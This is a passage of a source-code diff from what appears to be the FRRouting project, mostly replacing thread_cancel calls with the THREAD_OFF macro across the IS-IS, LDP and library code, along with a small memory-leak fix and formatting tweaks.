+ THREAD_OFF(circuit->u.bc.t_run_dr[0]);
+ THREAD_OFF(circuit->u.bc.t_run_dr[1]);
+ THREAD_OFF(circuit->u.bc.t_refresh_pseudo_lsp[0]);
+ THREAD_OFF(circuit->u.bc.t_refresh_pseudo_lsp[1]);
circuit->lsp_regenerate_pending[0] = 0;
circuit->lsp_regenerate_pending[1] = 0;
@@ -860,7 +860,7 @@ void isis_circuit_down(struct isis_circuit *circuit)
} else if (circuit->circ_type == CIRCUIT_T_P2P) {
isis_delete_adj(circuit->u.p2p.neighbor);
circuit->u.p2p.neighbor = NULL;
- thread_cancel(&circuit->u.p2p.t_send_p2p_hello);
+ THREAD_OFF(circuit->u.p2p.t_send_p2p_hello);
}
/*
@@ -873,11 +873,11 @@ void isis_circuit_down(struct isis_circuit *circuit)
circuit->snmp_adj_idx_gen = 0;
/* Cancel all active threads */
- thread_cancel(&circuit->t_send_csnp[0]);
- thread_cancel(&circuit->t_send_csnp[1]);
- thread_cancel(&circuit->t_send_psnp[0]);
- thread_cancel(&circuit->t_send_psnp[1]);
- thread_cancel(&circuit->t_read);
+ THREAD_OFF(circuit->t_send_csnp[0]);
+ THREAD_OFF(circuit->t_send_csnp[1]);
+ THREAD_OFF(circuit->t_send_psnp[0]);
+ THREAD_OFF(circuit->t_send_psnp[1]);
+ THREAD_OFF(circuit->t_read);
if (circuit->tx_queue) {
isis_tx_queue_free(circuit->tx_queue);
diff --git a/isisd/isis_cli.c b/isisd/isis_cli.c
index bbc569ec1c..a673cb8c1e 100644
--- a/isisd/isis_cli.c
+++ b/isisd/isis_cli.c
@@ -1629,8 +1629,10 @@ DEFPY_YANG (isis_sr_prefix_sid,
if (strmatch(lh_behavior, "no-php-flag"))
value = "no-php";
- else
+ else if (strmatch(lh_behavior, "explicit-null"))
value = "explicit-null";
+ else
+ value = "php";
nb_cli_enqueue_change(vty, "./last-hop-behavior", NB_OP_MODIFY,
value);
diff --git a/isisd/isis_dr.c b/isisd/isis_dr.c
index 27b7388072..b9bf49867d 100644
--- a/isisd/isis_dr.c
+++ b/isisd/isis_dr.c
@@ -222,8 +222,8 @@ int isis_dr_resign(struct isis_circuit *circuit, int level)
circuit->u.bc.is_dr[level - 1] = 0;
circuit->u.bc.run_dr_elect[level - 1] = 0;
- thread_cancel(&circuit->u.bc.t_run_dr[level - 1]);
- thread_cancel(&circuit->u.bc.t_refresh_pseudo_lsp[level - 1]);
+ THREAD_OFF(circuit->u.bc.t_run_dr[level - 1]);
+ THREAD_OFF(circuit->u.bc.t_refresh_pseudo_lsp[level - 1]);
circuit->lsp_regenerate_pending[level - 1] = 0;
memcpy(id, circuit->isis->sysid, ISIS_SYS_ID_LEN);
@@ -247,7 +247,7 @@ int isis_dr_resign(struct isis_circuit *circuit, int level)
&circuit->t_send_psnp[1]);
}
- thread_cancel(&circuit->t_send_csnp[level - 1]);
+ THREAD_OFF(circuit->t_send_csnp[level - 1]);
thread_add_timer(master, isis_run_dr,
&circuit->level_arg[level - 1],
@@ -285,8 +285,6 @@ int isis_dr_commence(struct isis_circuit *circuit, int level)
circuit->circuit_id;
assert(circuit->circuit_id); /* must be non-zero */
- /* if (circuit->t_send_l1_psnp)
- thread_cancel (circuit->t_send_l1_psnp); */
lsp_generate_pseudo(circuit, 1);
thread_add_timer(master, send_l1_csnp, circuit,
@@ -307,8 +305,6 @@ int isis_dr_commence(struct isis_circuit *circuit, int level)
circuit->circuit_id;
assert(circuit->circuit_id); /* must be non-zero */
- /* if (circuit->t_send_l1_psnp)
- thread_cancel (circuit->t_send_l1_psnp); */
lsp_generate_pseudo(circuit, 2);
thread_add_timer(master, send_l2_csnp, circuit,
diff --git a/isisd/isis_dynhn.c b/isisd/isis_dynhn.c
index 8d76e81934..5d6b7bc60a 100644
--- a/isisd/isis_dynhn.c
+++ b/isisd/isis_dynhn.c
@@ -57,7 +57,7 @@ void dyn_cache_finish(struct isis *isis)
struct listnode *node, *nnode;
struct isis_dynhn *dyn;
- thread_cancel(&isis->t_dync_clean);
+ THREAD_OFF(isis->t_dync_clean);
for (ALL_LIST_ELEMENTS(isis->dyn_cache, node, nnode, dyn)) {
list_delete_node(isis->dyn_cache, node);
diff --git a/isisd/isis_events.c b/isisd/isis_events.c
index fce48fec97..42823cf2b3 100644
--- a/isisd/isis_events.c
+++ b/isisd/isis_events.c
@@ -109,13 +109,13 @@ static void circuit_resign_level(struct isis_circuit *circuit, int level)
circuit->area->area_tag, circuit->circuit_id,
circuit->interface->name, level);
- thread_cancel(&circuit->t_send_csnp[idx]);
- thread_cancel(&circuit->t_send_psnp[idx]);
+ THREAD_OFF(circuit->t_send_csnp[idx]);
+ THREAD_OFF(circuit->t_send_psnp[idx]);
if (circuit->circ_type == CIRCUIT_T_BROADCAST) {
- thread_cancel(&circuit->u.bc.t_send_lan_hello[idx]);
- thread_cancel(&circuit->u.bc.t_run_dr[idx]);
- thread_cancel(&circuit->u.bc.t_refresh_pseudo_lsp[idx]);
+ THREAD_OFF(circuit->u.bc.t_send_lan_hello[idx]);
+ THREAD_OFF(circuit->u.bc.t_run_dr[idx]);
+ THREAD_OFF(circuit->u.bc.t_refresh_pseudo_lsp[idx]);
circuit->lsp_regenerate_pending[idx] = 0;
circuit->u.bc.run_dr_elect[idx] = 0;
circuit->u.bc.is_dr[idx] = 0;
diff --git a/isisd/isis_lfa.c b/isisd/isis_lfa.c
index 800cac8521..c4fadcba03 100644
--- a/isisd/isis_lfa.c
+++ b/isisd/isis_lfa.c
@@ -1519,7 +1519,7 @@ int isis_rlfa_activate(struct isis_spftree *spftree, struct rlfa *rlfa,
spftree->route_table_backup);
spftree->lfa.protection_counters.rlfa[vertex->N.ip.priority] += 1;
- thread_cancel(&area->t_rlfa_rib_update);
+ THREAD_OFF(area->t_rlfa_rib_update);
thread_add_timer(master, isis_area_verify_routes_cb, area, 2,
&area->t_rlfa_rib_update);
@@ -1538,7 +1538,7 @@ void isis_rlfa_deactivate(struct isis_spftree *spftree, struct rlfa *rlfa)
isis_route_delete(area, rn, spftree->route_table_backup);
spftree->lfa.protection_counters.rlfa[vertex->N.ip.priority] -= 1;
- thread_cancel(&area->t_rlfa_rib_update);
+ THREAD_OFF(area->t_rlfa_rib_update);
thread_add_timer(master, isis_area_verify_routes_cb, area, 2,
&area->t_rlfa_rib_update);
}
diff --git a/isisd/isis_lsp.c b/isisd/isis_lsp.c
index 8dbd41b5d9..5387f37039 100644
--- a/isisd/isis_lsp.c
+++ b/isisd/isis_lsp.c
@@ -1390,7 +1390,7 @@ int lsp_generate(struct isis_area *area, int level)
refresh_time = lsp_refresh_time(newlsp, rem_lifetime);
- thread_cancel(&area->t_lsp_refresh[level - 1]);
+ THREAD_OFF(area->t_lsp_refresh[level - 1]);
area->lsp_regenerate_pending[level - 1] = 0;
thread_add_timer(master, lsp_refresh,
&area->lsp_refresh_arg[level - 1], refresh_time,
@@ -1601,7 +1601,7 @@ int _lsp_regenerate_schedule(struct isis_area *area, int level,
"ISIS (%s): Will schedule regen timer. Last run was: %lld, Now is: %lld",
area->area_tag, (long long)lsp->last_generated,
(long long)now);
- thread_cancel(&area->t_lsp_refresh[lvl - 1]);
+ THREAD_OFF(area->t_lsp_refresh[lvl - 1]);
diff = now - lsp->last_generated;
if (diff < area->lsp_gen_interval[lvl - 1]
&& !(area->bfd_signalled_down)) {
@@ -1794,7 +1794,7 @@ int lsp_generate_pseudo(struct isis_circuit *circuit, int level)
lsp_flood(lsp, NULL);
refresh_time = lsp_refresh_time(lsp, rem_lifetime);
- thread_cancel(&circuit->u.bc.t_refresh_pseudo_lsp[level - 1]);
+ THREAD_OFF(circuit->u.bc.t_refresh_pseudo_lsp[level - 1]);
circuit->lsp_regenerate_pending[level - 1] = 0;
if (level == IS_LEVEL_1)
thread_add_timer(
@@ -1985,7 +1985,7 @@ int lsp_regenerate_schedule_pseudo(struct isis_circuit *circuit, int level)
"ISIS (%s): Will schedule PSN regen timer. Last run was: %lld, Now is: %lld",
area->area_tag, (long long)lsp->last_generated,
(long long)now);
- thread_cancel(&circuit->u.bc.t_refresh_pseudo_lsp[lvl - 1]);
+ THREAD_OFF(circuit->u.bc.t_refresh_pseudo_lsp[lvl - 1]);
diff = now - lsp->last_generated;
if (diff < circuit->area->lsp_gen_interval[lvl - 1]) {
timeout =
diff --git a/isisd/isis_pdu.c b/isisd/isis_pdu.c
index b1fbfd5140..47093fdd6b 100644
--- a/isisd/isis_pdu.c
+++ b/isisd/isis_pdu.c
@@ -205,7 +205,7 @@ static int process_p2p_hello(struct iih_info *iih)
adj);
/* lets take care of the expiry */
- thread_cancel(&adj->t_expire);
+ THREAD_OFF(adj->t_expire);
thread_add_timer(master, isis_adj_expire, adj, (long)adj->hold_time,
&adj->t_expire);
@@ -497,7 +497,7 @@ static int process_lan_hello(struct iih_info *iih)
adj);
/* lets take care of the expiry */
- thread_cancel(&adj->t_expire);
+ THREAD_OFF(adj->t_expire);
thread_add_timer(master, isis_adj_expire, adj, (long)adj->hold_time,
&adj->t_expire);
@@ -2064,7 +2064,7 @@ static void _send_hello_sched(struct isis_circuit *circuit,
if (thread_timer_remain_msec(*threadp) < (unsigned long)delay)
return;
- thread_cancel(threadp);
+ THREAD_OFF(*threadp);
}
thread_add_timer_msec(master, send_hello_cb,
diff --git a/isisd/isis_spf.c b/isisd/isis_spf.c
index 3aef8ada24..6be7c2d608 100644
--- a/isisd/isis_spf.c
+++ b/isisd/isis_spf.c
@@ -1938,7 +1938,7 @@ int _isis_spf_schedule(struct isis_area *area, int level,
area->area_tag, level, diff, func, file, line);
}
- thread_cancel(&area->t_rlfa_rib_update);
+ THREAD_OFF(area->t_rlfa_rib_update);
if (area->spf_delay_ietf[level - 1]) {
/* Need to call schedule function also if spf delay is running
* to
diff --git a/isisd/isis_sr.c b/isisd/isis_sr.c
index 107fa71d71..259047ff66 100644
--- a/isisd/isis_sr.c
+++ b/isisd/isis_sr.c
@@ -1180,7 +1180,7 @@ void isis_sr_stop(struct isis_area *area)
area->area_tag);
/* Disable any re-attempt to connect to Label Manager */
- thread_cancel(&srdb->t_start_lm);
+ THREAD_OFF(srdb->t_start_lm);
/* Uninstall all local Adjacency-SIDs. */
for (ALL_LIST_ELEMENTS(area->srdb.adj_sids, node, nnode, sra))
diff --git a/isisd/isis_tlvs.c b/isisd/isis_tlvs.c
index 11be3c3a71..b3c3fd4b0b 100644
--- a/isisd/isis_tlvs.c
+++ b/isisd/isis_tlvs.c
@@ -3580,9 +3580,9 @@ static int pack_tlv_router_cap(const struct isis_router_cap *router_cap,
}
static int unpack_tlv_router_cap(enum isis_tlv_context context,
- uint8_t tlv_type, uint8_t tlv_len,
- struct stream *s, struct sbuf *log,
- void *dest, int indent)
+ uint8_t tlv_type, uint8_t tlv_len,
+ struct stream *s, struct sbuf *log, void *dest,
+ int indent)
{
struct isis_tlvs *tlvs = dest;
struct isis_router_cap *rcap;
@@ -3627,7 +3627,7 @@ static int unpack_tlv_router_cap(enum isis_tlv_context context,
log, indent,
"WARNING: Router Capability subTLV length too large compared to expected size\n");
stream_forward_getp(s, STREAM_READABLE(s));
-
+ XFREE(MTYPE_ISIS_TLV, rcap);
return 0;
}
diff --git a/isisd/isis_tx_queue.c b/isisd/isis_tx_queue.c
index 078329221a..06369c6d70 100644
--- a/isisd/isis_tx_queue.c
+++ b/isisd/isis_tx_queue.c
@@ -92,7 +92,7 @@ static void tx_queue_element_free(void *element)
{
struct isis_tx_queue_entry *e = element;
- thread_cancel(&(e->retry));
+ THREAD_OFF(e->retry);
XFREE(MTYPE_TX_QUEUE_ENTRY, e);
}
@@ -161,7 +161,7 @@ void _isis_tx_queue_add(struct isis_tx_queue *queue,
e->type = type;
- thread_cancel(&(e->retry));
+ THREAD_OFF(e->retry);
thread_add_event(master, tx_queue_send_event, e, 0, &e->retry);
e->is_retry = false;
@@ -184,7 +184,7 @@ void _isis_tx_queue_del(struct isis_tx_queue *queue, struct isis_lsp *lsp,
func, file, line);
}
- thread_cancel(&(e->retry));
+ THREAD_OFF(e->retry);
hash_release(queue->hash, e);
XFREE(MTYPE_TX_QUEUE_ENTRY, e);
diff --git a/isisd/isisd.c b/isisd/isisd.c
index 996a62f4d5..3fd2476ad1 100644
--- a/isisd/isisd.c
+++ b/isisd/isisd.c
@@ -514,10 +514,10 @@ void isis_area_destroy(struct isis_area *area)
if (area->spf_timer[0])
isis_spf_timer_free(THREAD_ARG(area->spf_timer[0]));
- thread_cancel(&area->spf_timer[0]);
+ THREAD_OFF(area->spf_timer[0]);
if (area->spf_timer[1])
isis_spf_timer_free(THREAD_ARG(area->spf_timer[1]));
- thread_cancel(&area->spf_timer[1]);
+ THREAD_OFF(area->spf_timer[1]);
spf_backoff_free(area->spf_delay_ietf[0]);
spf_backoff_free(area->spf_delay_ietf[1]);
@@ -541,10 +541,10 @@ void isis_area_destroy(struct isis_area *area)
isis_lfa_tiebreakers_clear(area, ISIS_LEVEL1);
isis_lfa_tiebreakers_clear(area, ISIS_LEVEL2);
- thread_cancel(&area->t_tick);
- thread_cancel(&area->t_lsp_refresh[0]);
- thread_cancel(&area->t_lsp_refresh[1]);
- thread_cancel(&area->t_rlfa_rib_update);
+ THREAD_OFF(area->t_tick);
+ THREAD_OFF(area->t_lsp_refresh[0]);
+ THREAD_OFF(area->t_lsp_refresh[1]);
+ THREAD_OFF(area->t_rlfa_rib_update);
thread_cancel_event(master, area);
@@ -3094,12 +3094,12 @@ static void area_resign_level(struct isis_area *area, int level)
if (area->spf_timer[level - 1])
isis_spf_timer_free(THREAD_ARG(area->spf_timer[level - 1]));
- thread_cancel(&area->spf_timer[level - 1]);
+ THREAD_OFF(area->spf_timer[level - 1]);
sched_debug(
"ISIS (%s): Resigned from L%d - canceling LSP regeneration timer.",
area->area_tag, level);
- thread_cancel(&area->t_lsp_refresh[level - 1]);
+ THREAD_OFF(area->t_lsp_refresh[level - 1]);
area->lsp_regenerate_pending[level - 1] = 0;
}
diff --git a/ldpd/accept.c b/ldpd/accept.c
index 2999a35c06..1a04c563c1 100644
--- a/ldpd/accept.c
+++ b/ldpd/accept.c
@@ -72,7 +72,7 @@ accept_del(int fd)
LIST_FOREACH(av, &accept_queue.queue, entry)
if (av->fd == fd) {
log_debug("%s: %d removed from queue", __func__, fd);
- thread_cancel(&av->ev);
+ THREAD_OFF(av->ev);
LIST_REMOVE(av, entry);
free(av);
return;
@@ -92,7 +92,7 @@ accept_unpause(void)
{
if (accept_queue.evt != NULL) {
log_debug(__func__);
- thread_cancel(&accept_queue.evt);
+ THREAD_OFF(accept_queue.evt);
accept_arm();
}
}
@@ -111,7 +111,7 @@ accept_unarm(void)
{
struct accept_ev *av;
LIST_FOREACH(av, &accept_queue.queue, entry)
- thread_cancel(&av->ev);
+ THREAD_OFF(av->ev);
}
static void accept_cb(struct thread *thread)
diff --git a/ldpd/adjacency.c b/ldpd/adjacency.c
index bbc8a277a6..8caa3c4e24 100644
--- a/ldpd/adjacency.c
+++ b/ldpd/adjacency.c
@@ -196,7 +196,7 @@ static void adj_itimer(struct thread *thread)
void
adj_start_itimer(struct adj *adj)
{
- thread_cancel(&adj->inactivity_timer);
+ THREAD_OFF(adj->inactivity_timer);
adj->inactivity_timer = NULL;
thread_add_timer(master, adj_itimer, adj, adj->holdtime,
&adj->inactivity_timer);
@@ -205,7 +205,7 @@ adj_start_itimer(struct adj *adj)
void
adj_stop_itimer(struct adj *adj)
{
- thread_cancel(&adj->inactivity_timer);
+ THREAD_OFF(adj->inactivity_timer);
}
/* targeted neighbors */
@@ -354,7 +354,7 @@ static void tnbr_hello_timer(struct thread *thread)
static void
tnbr_start_hello_timer(struct tnbr *tnbr)
{
- thread_cancel(&tnbr->hello_timer);
+ THREAD_OFF(tnbr->hello_timer);
tnbr->hello_timer = NULL;
thread_add_timer(master, tnbr_hello_timer, tnbr, tnbr_get_hello_interval(tnbr),
&tnbr->hello_timer);
@@ -363,7 +363,7 @@ tnbr_start_hello_timer(struct tnbr *tnbr)
static void
tnbr_stop_hello_timer(struct tnbr *tnbr)
{
- thread_cancel(&tnbr->hello_timer);
+ THREAD_OFF(tnbr->hello_timer);
}
struct ctl_adj *
@@ -386,7 +386,7 @@ adj_to_ctl(struct adj *adj)
}
actl.holdtime = adj->holdtime;
actl.holdtime_remaining =
- thread_timer_remain_second(adj->inactivity_timer);
+ thread_timer_remain_second(adj->inactivity_timer);
actl.trans_addr = adj->trans_addr;
actl.ds_tlv = adj->ds_tlv;
diff --git a/ldpd/control.c b/ldpd/control.c
index 376f488bd1..09e91217ae 100644
--- a/ldpd/control.c
+++ b/ldpd/control.c
@@ -180,8 +180,8 @@ control_close(int fd)
msgbuf_clear(&c->iev.ibuf.w);
TAILQ_REMOVE(&ctl_conns, c, entry);
- thread_cancel(&c->iev.ev_read);
- thread_cancel(&c->iev.ev_write);
+ THREAD_OFF(c->iev.ev_read);
+ THREAD_OFF(c->iev.ev_write);
close(c->iev.ibuf.fd);
accept_unpause();
free(c);
diff --git a/ldpd/interface.c b/ldpd/interface.c
index af6e8fd7ec..392e25470f 100644
--- a/ldpd/interface.c
+++ b/ldpd/interface.c
@@ -467,7 +467,7 @@ static void if_hello_timer(struct thread *thread)
static void
if_start_hello_timer(struct iface_af *ia)
{
- thread_cancel(&ia->hello_timer);
+ THREAD_OFF(ia->hello_timer);
thread_add_timer(master, if_hello_timer, ia, if_get_hello_interval(ia),
&ia->hello_timer);
}
@@ -475,7 +475,7 @@ if_start_hello_timer(struct iface_af *ia)
static void
if_stop_hello_timer(struct iface_af *ia)
{
- thread_cancel(&ia->hello_timer);
+ THREAD_OFF(ia->hello_timer);
}
struct ctl_iface *
@@ -543,11 +543,8 @@ ldp_sync_to_ctl(struct iface *iface)
ictl.wait_time = if_get_wait_for_sync_interval();
ictl.timer_running = iface->ldp_sync.wait_for_sync_timer ? true : false;
- if (iface->ldp_sync.wait_for_sync_timer)
- ictl.wait_time_remaining =
+ ictl.wait_time_remaining =
thread_timer_remain_second(iface->ldp_sync.wait_for_sync_timer);
- else
- ictl.wait_time_remaining = 0;
memset(&ictl.peer_ldp_id, 0, sizeof(ictl.peer_ldp_id));
diff --git a/ldpd/lde.c b/ldpd/lde.c
index 9d1daabbe9..efc07b4547 100644
--- a/ldpd/lde.c
+++ b/ldpd/lde.c
@@ -417,8 +417,8 @@ static void lde_dispatch_imsg(struct thread *thread)
imsg_event_add(iev);
else {
/* this pipe is dead, so remove the event handlers and exit */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
lde_shutdown();
}
}
@@ -702,8 +702,8 @@ static void lde_dispatch_parent(struct thread *thread)
imsg_event_add(iev);
else {
/* this pipe is dead, so remove the event handlers and exit */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
lde_shutdown();
}
}
diff --git a/ldpd/lde_lib.c b/ldpd/lde_lib.c
index 1ade3c5378..4366560546 100644
--- a/ldpd/lde_lib.c
+++ b/ldpd/lde_lib.c
@@ -1068,7 +1068,7 @@ void lde_gc_timer(struct thread *thread)
void
lde_gc_start_timer(void)
{
- thread_cancel(&gc_timer);
+ THREAD_OFF(gc_timer);
thread_add_timer(master, lde_gc_timer, NULL, LDE_GC_INTERVAL,
&gc_timer);
}
@@ -1076,5 +1076,5 @@ lde_gc_start_timer(void)
void
lde_gc_stop_timer(void)
{
- thread_cancel(&gc_timer);
+ THREAD_OFF(gc_timer);
}
diff --git a/ldpd/ldpd.c b/ldpd/ldpd.c
index 796cf11798..87d78afa25 100644
--- a/ldpd/ldpd.c
+++ b/ldpd/ldpd.c
@@ -616,8 +616,8 @@ static void main_dispatch_ldpe(struct thread *thread)
imsg_event_add(iev);
else {
/* this pipe is dead, so remove the event handlers and exit */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
ldpe_pid = 0;
if (lde_pid == 0)
ldpd_shutdown();
@@ -721,8 +721,8 @@ static void main_dispatch_lde(struct thread *thread)
imsg_event_add(iev);
else {
/* this pipe is dead, so remove the event handlers and exit */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
lde_pid = 0;
if (ldpe_pid == 0)
ldpd_shutdown();
@@ -744,8 +744,8 @@ void ldp_write_handler(struct thread *thread)
fatal("msgbuf_write");
if (n == 0) {
/* this pipe is dead, so remove the event handlers */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
return;
}
@@ -829,7 +829,7 @@ void evbuf_init(struct evbuf *eb, int fd, void (*handler)(struct thread *),
void
evbuf_clear(struct evbuf *eb)
{
- thread_cancel(&eb->ev);
+ THREAD_OFF(eb->ev);
msgbuf_clear(&eb->wbuf);
eb->wbuf.fd = -1;
}
diff --git a/ldpd/ldpe.c b/ldpd/ldpe.c
index 29abd420e5..792dcb2f2a 100644
--- a/ldpd/ldpe.c
+++ b/ldpd/ldpe.c
@@ -212,7 +212,7 @@ ldpe_shutdown(void)
#ifdef __OpenBSD__
if (sysdep.no_pfkey == 0) {
- thread_cancel(&pfkey_ev);
+ THREAD_OFF(pfkey_ev);
close(global.pfkeysock);
}
#endif
@@ -626,8 +626,8 @@ static void ldpe_dispatch_main(struct thread *thread)
imsg_event_add(iev);
else {
/* this pipe is dead, so remove the event handlers and exit */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
ldpe_shutdown();
}
}
@@ -762,8 +762,8 @@ static void ldpe_dispatch_lde(struct thread *thread)
imsg_event_add(iev);
else {
/* this pipe is dead, so remove the event handlers and exit */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
ldpe_shutdown();
}
}
@@ -813,14 +813,14 @@ ldpe_close_sockets(int af)
af_global = ldp_af_global_get(&global, af);
/* discovery socket */
- thread_cancel(&af_global->disc_ev);
+ THREAD_OFF(af_global->disc_ev);
if (af_global->ldp_disc_socket != -1) {
close(af_global->ldp_disc_socket);
af_global->ldp_disc_socket = -1;
}
/* extended discovery socket */
- thread_cancel(&af_global->edisc_ev);
+ THREAD_OFF(af_global->edisc_ev);
if (af_global->ldp_edisc_socket != -1) {
close(af_global->ldp_edisc_socket);
af_global->ldp_edisc_socket = -1;
diff --git a/ldpd/neighbor.c b/ldpd/neighbor.c
index 867ad92e47..e1db9e8e1e 100644
--- a/ldpd/neighbor.c
+++ b/ldpd/neighbor.c
@@ -307,7 +307,7 @@ nbr_del(struct nbr *nbr)
nbr->auth.method = AUTH_NONE;
if (nbr_pending_connect(nbr))
- thread_cancel(&nbr->ev_connect);
+ THREAD_OFF(nbr->ev_connect);
nbr_stop_ktimer(nbr);
nbr_stop_ktimeout(nbr);
nbr_stop_itimeout(nbr);
@@ -435,7 +435,7 @@ nbr_start_ktimer(struct nbr *nbr)
/* send three keepalives per period */
secs = nbr->keepalive / KEEPALIVE_PER_PERIOD;
- thread_cancel(&nbr->keepalive_timer);
+ THREAD_OFF(nbr->keepalive_timer);
nbr->keepalive_timer = NULL;
thread_add_timer(master, nbr_ktimer, nbr, secs, &nbr->keepalive_timer);
}
@@ -443,7 +443,7 @@ nbr_start_ktimer(struct nbr *nbr)
void
nbr_stop_ktimer(struct nbr *nbr)
{
- thread_cancel(&nbr->keepalive_timer);
+ THREAD_OFF(nbr->keepalive_timer);
}
/* Keepalive timeout: if the nbr hasn't sent keepalive */
@@ -462,7 +462,7 @@ static void nbr_ktimeout(struct thread *thread)
static void
nbr_start_ktimeout(struct nbr *nbr)
{
- thread_cancel(&nbr->keepalive_timeout);
+ THREAD_OFF(nbr->keepalive_timeout);
nbr->keepalive_timeout = NULL;
thread_add_timer(master, nbr_ktimeout, nbr, nbr->keepalive,
&nbr->keepalive_timeout);
@@ -471,7 +471,7 @@ nbr_start_ktimeout(struct nbr *nbr)
void
nbr_stop_ktimeout(struct nbr *nbr)
{
- thread_cancel(&nbr->keepalive_timeout);
+ THREAD_OFF(nbr->keepalive_timeout);
}
/* Session initialization timeout: if nbr got stuck in the initialization FSM */
@@ -491,7 +491,7 @@ nbr_start_itimeout(struct nbr *nbr)
int secs;
secs = INIT_FSM_TIMEOUT;
- thread_cancel(&nbr->init_timeout);
+ THREAD_OFF(nbr->init_timeout);
nbr->init_timeout = NULL;
thread_add_timer(master, nbr_itimeout, nbr, secs, &nbr->init_timeout);
}
@@ -499,7 +499,7 @@ nbr_start_itimeout(struct nbr *nbr)
void
nbr_stop_itimeout(struct nbr *nbr)
{
- thread_cancel(&nbr->init_timeout);
+ THREAD_OFF(nbr->init_timeout);
}
/* Init delay timer: timer to retry to iniziatize session */
@@ -537,7 +537,7 @@ nbr_start_idtimer(struct nbr *nbr)
break;
}
- thread_cancel(&nbr->initdelay_timer);
+ THREAD_OFF(nbr->initdelay_timer);
nbr->initdelay_timer = NULL;
thread_add_timer(master, nbr_idtimer, nbr, secs,
&nbr->initdelay_timer);
@@ -546,7 +546,7 @@ nbr_start_idtimer(struct nbr *nbr)
void
nbr_stop_idtimer(struct nbr *nbr)
{
- thread_cancel(&nbr->initdelay_timer);
+ THREAD_OFF(nbr->initdelay_timer);
}
int
@@ -847,11 +847,8 @@ nbr_to_ctl(struct nbr *nbr)
nctl.stats = nbr->stats;
nctl.flags = nbr->flags;
nctl.max_pdu_len = nbr->max_pdu_len;
- if (nbr->keepalive_timer)
- nctl.hold_time_remaining =
- thread_timer_remain_second(nbr->keepalive_timer);
- else
- nctl.hold_time_remaining = 0;
+ nctl.hold_time_remaining =
+ thread_timer_remain_second(nbr->keepalive_timer);
gettimeofday(&now, NULL);
if (nbr->state == NBR_STA_OPER) {
diff --git a/ldpd/packet.c b/ldpd/packet.c
index 707878ca9f..2cca52461f 100644
--- a/ldpd/packet.c
+++ b/ldpd/packet.c
@@ -651,7 +651,7 @@ session_shutdown(struct nbr *nbr, uint32_t status, uint32_t msg_id,
switch (nbr->state) {
case NBR_STA_PRESENT:
if (nbr_pending_connect(nbr))
- thread_cancel(&nbr->ev_connect);
+ THREAD_OFF(nbr->ev_connect);
break;
case NBR_STA_INITIAL:
case NBR_STA_OPENREC:
@@ -756,7 +756,7 @@ tcp_close(struct tcp_conn *tcp)
evbuf_clear(&tcp->wbuf);
if (tcp->nbr) {
- thread_cancel(&tcp->rev);
+ THREAD_OFF(tcp->rev);
free(tcp->rbuf);
tcp->nbr->tcp = NULL;
}
@@ -788,7 +788,7 @@ pending_conn_new(int fd, int af, union ldpd_addr *addr)
void
pending_conn_del(struct pending_conn *pconn)
{
- thread_cancel(&pconn->ev_timeout);
+ THREAD_OFF(pconn->ev_timeout);
TAILQ_REMOVE(&global.pending_conns, pconn, entry);
free(pconn);
}
diff --git a/lib/agentx.c b/lib/agentx.c
index 821c573fb2..4c087219cb 100644
--- a/lib/agentx.c
+++ b/lib/agentx.c
@@ -118,7 +118,6 @@ static void agentx_events_update(void)
snmp_select_info(&maxfd, &fds, &timeout, &block);
if (!block) {
- timeout_thr = NULL;
thread_add_timer_tv(agentx_tm, agentx_timeout, NULL, &timeout,
&timeout_thr);
}
@@ -147,9 +146,9 @@ static void agentx_events_update(void)
else if (FD_ISSET(fd, &fds)) {
struct listnode *newln;
thr = XCALLOC(MTYPE_TMP, sizeof(struct thread *));
- thread_add_read(agentx_tm, agentx_read, NULL, fd, thr);
+
newln = listnode_add_before(events, ln, thr);
- (*thr)->arg = newln;
+ thread_add_read(agentx_tm, agentx_read, newln, fd, thr);
}
}
diff --git a/lib/ferr.c b/lib/ferr.c
index 9d79f38b7c..bef7f3b209 100644
--- a/lib/ferr.c
+++ b/lib/ferr.c
@@ -84,7 +84,7 @@ void log_ref_add(struct log_ref *ref)
{
uint32_t i = 0;
- frr_with_mutex(&refs_mtx) {
+ frr_with_mutex (&refs_mtx) {
while (ref[i].code != END_FERR) {
(void)hash_get(refs, &ref[i], hash_alloc_intern);
i++;
@@ -98,7 +98,7 @@ struct log_ref *log_ref_get(uint32_t code)
struct log_ref *ref;
holder.code = code;
- frr_with_mutex(&refs_mtx) {
+ frr_with_mutex (&refs_mtx) {
ref = hash_lookup(refs, &holder);
}
@@ -115,7 +115,7 @@ void log_ref_display(struct vty *vty, uint32_t code, bool json)
if (json)
top = json_object_new_object();
- frr_with_mutex(&refs_mtx) {
+ frr_with_mutex (&refs_mtx) {
errlist = code ? list_new() : hash_to_list(refs);
}
@@ -182,7 +182,7 @@ DEFUN_NOSH(show_error_code,
void log_ref_init(void)
{
- frr_with_mutex(&refs_mtx) {
+ frr_with_mutex (&refs_mtx) {
refs = hash_create(ferr_hash_key, ferr_hash_cmp,
"Error Reference Texts");
}
@@ -190,7 +190,7 @@ void log_ref_init(void)
void log_ref_fini(void)
{
- frr_with_mutex(&refs_mtx) {
+ frr_with_mutex (&refs_mtx) {
hash_clean(refs, NULL);
hash_free(refs);
refs = NULL;
diff --git a/lib/frr_pthread.c b/lib/frr_pthread.c
index 0f56fbac83..dd675bbb85 100644
--- a/lib/frr_pthread.c
+++ b/lib/frr_pthread.c
@@ -55,7 +55,7 @@ static struct list *frr_pthread_list;
void frr_pthread_init(void)
{
- frr_with_mutex(&frr_pthread_list_mtx) {
+ frr_with_mutex (&frr_pthread_list_mtx) {
frr_pthread_list = list_new();
}
}
